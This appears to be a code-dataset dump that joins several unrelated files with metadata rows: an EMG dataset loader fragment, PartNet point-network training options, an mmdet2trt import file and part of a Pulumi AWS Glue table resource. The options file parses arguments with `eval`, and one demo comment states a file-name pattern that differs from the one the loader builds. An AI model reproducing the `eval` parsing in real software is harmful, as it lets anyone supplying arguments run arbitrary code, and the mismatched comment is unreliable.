if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
for i in range(1, self.n_subjects+1):
path = f"{self.path}/s{i}/S{i}_A1_E{trial}.mat"
emg, l, r = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
return data, labs, reps
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
# represents a group of either hand motions, funcitonal motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
print("rolling")
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
        # next we want to make sure there aren't multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
print("cleaning")
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
self.emg = self.emg[np.where(self.labels != 0)[0]]
self.repetition = self.repetition[np.where(self.labels != 0)[0]]
self.labels = self.labels[np.where(self.labels !=0)[0]]
self.labels -= 1
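# Illustrative usage sketch for the loader classes above.  The path is a
# placeholder; it must contain subject folders s1, s2, ... with files named
# S{i}_E{trial}_A1.mat as expected by _load_by_trial.
def _demo_dataset_usage():
    ds = dataset(path="/data/ninapro", exercises=["a"], step=5, window=52)
    # ds.emg        -> (num_windows, window, channels) float16 EMG windows
    # ds.labels     -> (num_windows,) first gesture label appearing in each window
    # ds.repetition -> (num_windows,) repetition id, used for leak-free splits
    train = ds.repetition <= 4                              # e.g. repetitions 1-4 for training
    return ds.emg[train], ds.labels[train]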
[quality-signal values for the preceding file]
5415abad33148486dc40abb147c9e02e3c4db8c0 | 29,834 | py | Python | Configs/partnet_options.py | erictuanle/GoingDeeperwPointNetworks | ab48e5d542289b485118ababf4716eb1686b302b | ["MIT"] | 58 | 2019-07-02T01:41:59.000Z | 2021-03-14T07:11:20.000Z | Configs/partnet_options.py | erictuanle/GoingDeeperwPointNetworks | ab48e5d542289b485118ababf4716eb1686b302b | ["MIT"] | 11 | 2019-07-04T08:38:08.000Z | 2020-11-13T12:47:15.000Z | Configs/partnet_options.py | erictuanle/GoingDeeperwPointNetworks | ab48e5d542289b485118ababf4716eb1686b302b | ["MIT"] | 10 | 2020-03-08T03:02:01.000Z | 2021-02-07T02:08:25.000Z |
import os
import torch
import argparse
from Configs.base_options import BaseOptions
#######################################################################################################################
# This script is based on the CycleGan & Pix2Pix code repository
# https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix
#######################################################################################################################
class PartnetOptions(BaseOptions):
def initialize(self, parser):
parser = BaseOptions.initialize(self, parser)
parser.add_argument('--indir', type=str, default='/mnt/Data/PartNet2/', help='input folder')
parser.add_argument('--num_classes', type=int, default=17, help='number of object categories')
        parser.add_argument('--num_parts', type=int, default=251, help='number of object parts')
parser.add_argument('--num_points_training', type=int, default=10000, help='number of points to use for training')
parser.add_argument('--in_channel_x_complete', type=int, default=None, help='dimension of the features (normals, ...)')
parser.add_argument('--in_channel', type=int, default=3, help='dimension of the spatial input')
self.network = parser.parse_known_args()[0].network
if self.network == 'PointNet++':
parser = self.initialize_pointnet2(parser)
elif self.network == 'mRes':
parser = self.initialize_mRes(parser)
elif self.network == 'mResX':
parser = self.initialize_mResX(parser)
elif self.network == 'convPN':
parser = self.initialize_convPN(parser)
elif self.network == 'deepConvPN':
parser = self.initialize_deepConvPN(parser)
self.isTrain = True
return parser
def initialize_pointnet2(self, parser):
parser.add_argument('--name', type=str, default='training_pointnet2_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with Pointnet++.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[512, 128, 128], help='resolution of the point cloud at each step of the encoding (3 non increasing integers)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 64, 128],
[64, 96, 128],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball'] * 3,
['query_ball'] * 3,
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max']*3,
['max']*3,
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]]*3,
[[]]*3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
        parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the output linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
return parser
def initialize_mRes(self, parser):
parser.add_argument('--name', type=str, default='training_mres_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with mRes.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64],
[128]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball'],
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--cross_connection', type=lambda x: eval(x), default=[[False, False],
[False, False],
[None, None]], help='whether to use x-link at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max'],
['max', 'max', 'max'],
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]] * 3,
[[]] * 3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
        parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the output linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--dropout_rate_cross', type=int, default=0, help='dropout rate to use for all of the crosslinks')
parser.add_argument('--nb_interpolating_points_encoding', type=lambda x: eval(x), default=[[8, 8],
[8, 8],
[None]], help='number of points to use for interpolation at each resolution and at each of the encoding steps')
parser.add_argument('--nb_interpolating_points_crossconnection', type=lambda x: eval(x), default=[[[8, 8], [8, 8]],
[[8, 8], [8, 8]],
[None]], help='number of points to use for interpolation for each crosslinks at each resolution and at each of the encoding steps')
return parser
def initialize_mResX(self, parser):
parser.add_argument('--name', type=str, default='training_mresx_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with mResX.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64],
[128]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball'],
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--cross_connection', type=lambda x: eval(x), default=[[True, True],
[True, True],
[None, None]], help='whether to use x-link at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max'],
['max', 'max', 'max'],
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]] * 3,
[[]] * 3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
        parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the output linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--dropout_rate_cross', type=int, default=0, help='dropout rate to use for all of the crosslinks')
parser.add_argument('--nb_interpolating_points_encoding', type=lambda x: eval(x), default=[[8, 8],
[8, 8],
[None]], help='number of points to use for interpolation at each resolution and at each of the encoding steps')
parser.add_argument('--nb_interpolating_points_crossconnection', type=lambda x: eval(x), default=[[[8, 8], [8, 8]],
[[8, 8], [8, 8]],
[None]], help='number of points to use for interpolation for each crosslinks at each resolution and at each of the encoding steps')
return parser
def initialize_convPN(self, parser):
parser.add_argument('--name', type=str, default='training_convpn_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with convPN.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball']], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4, 0.4],
[0.2, 0.4, 0.8, 0.8]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[256, 512, 1024]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True, True],
[True, True, True, True],
True], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--use_crosslinks', type=lambda x: eval(x), default=[False, False], help='whether to use x-link at each of the encoding steps')
parser.add_argument('--use_reslinks', type=lambda x: eval(x), default=[True, True], help='whether to use residual-link at each of the encoding steps')
parser.add_argument('--sequence', type=lambda x: eval(x), default=[['CS', 'C', 'C'],
['C', 'C', 'C', 'S']], help='sequence of block to select (C or S) to use for each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max', 'max'],
['max', 'max', 'max', 'max'],
'max'], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--residuallinks_input', type=lambda x: eval(x), default=[], help='input of the residual links for the third encoding block')
parser.add_argument('--residuallinks_output', type=lambda x: eval(x), default=[], help='output of the residual links for the third encoding block')
        parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the output linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[[8, 8, 8], [8, 8, 8], None, 3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--blockout_rate', type=lambda x: eval(x), default=[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], help='dropout rate of each of the convolutional block at each of the encoding steps')
return parser
def initialize_deepConvPN(self, parser):
parser.add_argument('--name', type=str, default='training_deepconvpn_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with deepConvPN.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball']], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4, 0.4],
[0.2, 0.4, 0.8, 0.8]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding', type=lambda x: eval(x), default=[[[32, 32, 32, 32, 64, 64], [64, 64, 64, 64, 128, 128], [64, 64, 96, 96, 128, 128]],
[[64, 64, 64, 64, 128, 128], [128, 128, 128, 128, 256, 256], [128, 128, 128, 128, 256, 256]],
[256, 128, 256, 512, 128, 512, 1024, 128, 1024]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True, True],
[True, True, True, True],
True], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--use_crosslinks', type=lambda x: eval(x), default=[False, False], help='whether to use x-link at each of the encoding steps')
parser.add_argument('--use_reslinks', type=lambda x: eval(x), default=[True, True], help='whether to use residual-link at each of the encoding steps')
parser.add_argument('--sequence', type=lambda x: eval(x), default=[['CS', 'C', 'C', 'C', 'C', 'C'],
['C', 'C', 'C', 'S', 'C', 'C', 'C']], help='sequence of blocks (C or S) to use at each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max', 'max'],
['max', 'max', 'max', 'max'],
'max'], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--residuallinks_input', type=lambda x: eval(x), default=[1, 4, 7], help='input of the residual links for the third encoding block')
parser.add_argument('--residuallinks_output', type=lambda x: eval(x), default=[2, 5, 8], help='output of the residual links for the third encoding block')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the output linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[[8, 8, 8], [8, 8, 8], None, 3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--blockout_rate', type=lambda x: eval(x), default=[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], help='dropout rate of each convolutional block at each of the encoding steps')
return parser
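# Hedged usage sketch (not part of the original file): the list-valued options
# above are declared with `type=lambda x: eval(x)`, so command-line values must
# be Python literals. A minimal, self-contained illustration of that pattern:
def _demo_eval_typed_option():
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7])
    # the value string is evaluated into a Python list
    args = parser.parse_args(['--dropout_rate', '[0.5]'])
    assert args.dropout_rate == [0.5]
    return args
# Design note: eval() executes arbitrary expressions; ast.literal_eval is a
# safer drop-in when the values are plain Python literals, as they are here.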
| 120.298387
| 250
| 0.500134
| 3,352
| 29,834
| 4.352625
| 0.057578
| 0.070322
| 0.132831
| 0.083276
| 0.926319
| 0.918369
| 0.914119
| 0.912132
| 0.911446
| 0.902262
| 0
| 0.045094
| 0.378595
| 29,834
| 248
| 251
| 120.298387
| 0.741895
| 0.003955
| 0
| 0.728814
| 0
| 0
| 0.324026
| 0.042204
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025424
| false
| 0
| 0.016949
| 0
| 0.072034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
582009347dd106a8c7d8202695e94770b51c126b
| 127
|
py
|
Python
|
mmdet2trt/core/anchor/__init__.py
|
jackweiwang/mmdetection-to-tensorrt
|
f988ba8e923764fb1173385a1c7160b8f8b5bd99
|
[
"Apache-2.0"
] | 1
|
2021-08-23T10:09:37.000Z
|
2021-08-23T10:09:37.000Z
|
mmdet2trt/core/anchor/__init__.py
|
gcong18/mmdetection-to-tensorrt
|
c31c32ee4720ff56010bcda77bacf3a110d0526c
|
[
"Apache-2.0"
] | null | null | null |
mmdet2trt/core/anchor/__init__.py
|
gcong18/mmdetection-to-tensorrt
|
c31c32ee4720ff56010bcda77bacf3a110d0526c
|
[
"Apache-2.0"
] | null | null | null |
from .anchor_generator import AnchorGeneratorWraper, SSDAnchorGeneratorWraper
from .point_generator import PointGeneratorWraper
| 63.5
| 77
| 0.913386
| 11
| 127
| 10.363636
| 0.727273
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 127
| 2
| 78
| 63.5
| 0.957983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
584fe8791bbdb068bf52559af2739c9eba4ad57d
| 18,680
|
py
|
Python
|
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/catalog_table.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class CatalogTable(pulumi.CustomResource):
catalog_id: pulumi.Output[str]
"""
ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
"""
database_name: pulumi.Output[str]
"""
Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
"""
description: pulumi.Output[str]
"""
Description of the table.
"""
name: pulumi.Output[str]
"""
Name of the SerDe.
"""
owner: pulumi.Output[str]
"""
Owner of the table.
"""
parameters: pulumi.Output[dict]
"""
A map of initialization parameters for the SerDe, in key-value form.
"""
partition_keys: pulumi.Output[list]
"""
A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
* `comment` (`str`) - Free-form text comment.
* `name` (`str`) - Name of the SerDe.
* `type` (`str`) - The datatype of data in the Column.
"""
retention: pulumi.Output[float]
"""
Retention time for this table.
"""
storage_descriptor: pulumi.Output[dict]
"""
A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
* `bucketColumns` (`list`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`list`) - A list of the Columns in the table.
* `comment` (`str`) - Free-form text comment.
* `name` (`str`) - Name of the SerDe.
* `type` (`str`) - The datatype of data in the Column.
* `compressed` (`bool`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`str`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`str`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`float`) - Must be specified if the table contains any dimension columns.
* `outputFormat` (`str`) - The output format: SequenceFileOutputFormat (binary), or IgnoreKeyTextOutputFormat, or a custom format.
* `parameters` (`dict`) - A map of initialization parameters for the SerDe, in key-value form.
* `serDeInfo` (`dict`) - Serialization/deserialization (SerDe) information.
* `name` (`str`) - Name of the SerDe.
* `parameters` (`dict`) - A map of initialization parameters for the SerDe, in key-value form.
* `serializationLibrary` (`str`) - Usually the class that implements the SerDe. An example is: org.apache.hadoop.hive.serde2.columnar.ColumnarSerDe.
* `skewedInfo` (`dict`) - Information about values that appear very frequently in a column (skewed values).
* `skewedColumnNames` (`list`) - A list of names of columns that contain skewed values.
* `skewedColumnValueLocationMaps` (`dict`) - A list of values that appear so frequently as to be considered skewed.
* `skewedColumnValues` (`list`) - A mapping of skewed values to the columns that contain them.
* `sortColumns` (`list`) - A list of Order objects specifying the sort order of each bucket in the table.
* `column` (`str`) - The name of the column.
* `sortOrder` (`float`) - Indicates that the column is sorted in ascending order (== 1), or in descending order (==0).
* `storedAsSubDirectories` (`bool`) - True if the table data is stored in subdirectories, or False if not.
"""
table_type: pulumi.Output[str]
"""
The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
"""
view_expanded_text: pulumi.Output[str]
"""
If the table is a view, the expanded text of the view; otherwise null.
"""
view_original_text: pulumi.Output[str]
"""
If the table is a view, the original text of the view; otherwise null.
"""
def __init__(__self__, resource_name, opts=None, catalog_id=None, database_name=None, description=None, name=None, owner=None, parameters=None, partition_keys=None, retention=None, storage_descriptor=None, table_type=None, view_expanded_text=None, view_original_text=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Glue Catalog Table Resource. You can refer to the [Glue Developer Guide](http://docs.aws.amazon.com/glue/latest/dg/populate-data-catalog.html) for a full explanation of the Glue Data Catalog functionality.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] catalog_id: ID of the Glue Catalog and database to create the table in. If omitted, this defaults to the AWS Account ID plus the database name.
:param pulumi.Input[str] database_name: Name of the metadata database where the table metadata resides. For Hive compatibility, this must be all lowercase.
:param pulumi.Input[str] description: Description of the table.
:param pulumi.Input[str] name: Name of the SerDe.
:param pulumi.Input[str] owner: Owner of the table.
:param pulumi.Input[dict] parameters: A map of initialization parameters for the SerDe, in key-value form.
:param pulumi.Input[list] partition_keys: A list of columns by which the table is partitioned. Only primitive types are supported as partition keys.
:param pulumi.Input[float] retention: Retention time for this table.
:param pulumi.Input[dict] storage_descriptor: A storage descriptor object containing information about the physical storage of this table. You can refer to the [Glue Developer Guide](https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-tables.html#aws-glue-api-catalog-tables-StorageDescriptor) for a full explanation of this object.
:param pulumi.Input[str] table_type: The type of this table (EXTERNAL_TABLE, VIRTUAL_VIEW, etc.).
:param pulumi.Input[str] view_expanded_text: If the table is a view, the expanded text of the view; otherwise null.
:param pulumi.Input[str] view_original_text: If the table is a view, the original text of the view; otherwise null.
The **partition_keys** object supports the following:
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
The **storage_descriptor** object supports the following:
* `bucketColumns` (`pulumi.Input[list]`) - A list of reducer grouping columns, clustering columns, and bucketing columns in the table.
* `columns` (`pulumi.Input[list]`) - A list of the Columns in the table.
* `comment` (`pulumi.Input[str]`) - Free-form text comment.
* `name` (`pulumi.Input[str]`) - Name of the SerDe.
* `type` (`pulumi.Input[str]`) - The datatype of data in the Column.
* `compressed` (`pulumi.Input[bool]`) - True if the data in the table is compressed, or False if not.
* `inputFormat` (`pulumi.Input[str]`) - The input format: SequenceFileInputFormat (binary), or TextInputFormat, or a custom format.
* `location` (`pulumi.Input[str]`) - The physical location of the table. By default this takes the form of the warehouse location, followed by the database location in the warehouse, followed by the table name.
* `numberOfBuckets` (`pulumi.Input[float]`) - Must be specified if the table contains any dimension columns.
